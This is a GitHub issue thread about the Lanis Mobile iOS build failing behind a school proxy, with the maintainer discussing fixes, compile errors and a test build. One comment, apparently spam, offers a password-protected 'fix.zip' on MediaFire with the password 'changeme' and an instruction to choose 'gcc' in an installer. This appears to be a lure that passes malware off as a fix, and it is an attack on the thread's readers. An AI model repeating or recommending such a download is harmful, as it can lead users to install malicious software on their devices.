### ISSUE TITLE
iOS Build maybe doesn’t include Proxy Fix

### ISSUE THREAD

**Issue by Rajala1404** [lanis-mobile/lanis-mobile#243]
I tried using Lanis Mobile (The App Store Version) on my iPad inside the School and it doesn’t work (doesn’t load schools or logging in) so maybe the current iOS build doesn’t include the Proxy Fix

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alessioC42** [comment]
> I tried using Lanis Mobile (The App Store Version) on my iPad inside the School and it doesn’t work (doesn’t load schools or logging in) so maybe the current iOS build doesn’t include the Proxy Fix

That's possible. I am planing to fix a hand full of issues today/tomorrow and will look into that too.

**Comment by Rajala1404** [comment]
Also could you send me a release build from the git repo because I can’t manage to compile it on my device because device_info_plus throws some error I’m too stupid to fix

**Comment by alessioC42** [comment]
I am currently trying to get it to work too. We had 2 separate branches for the holidays and http_proxy currently throws some compilation errors on my end :D I will send you a test build asap

Also if you like I could add you to our developer discord chat. Just send my an E-Mail to alessioc42.dev@gmail.com with your dc or send it in here if you do not care about that

**Comment by Rajala1404** [comment]
dc is "rajala1404" so i dont really care

**Comment by Rajala1404** [comment]
Please refer to #265
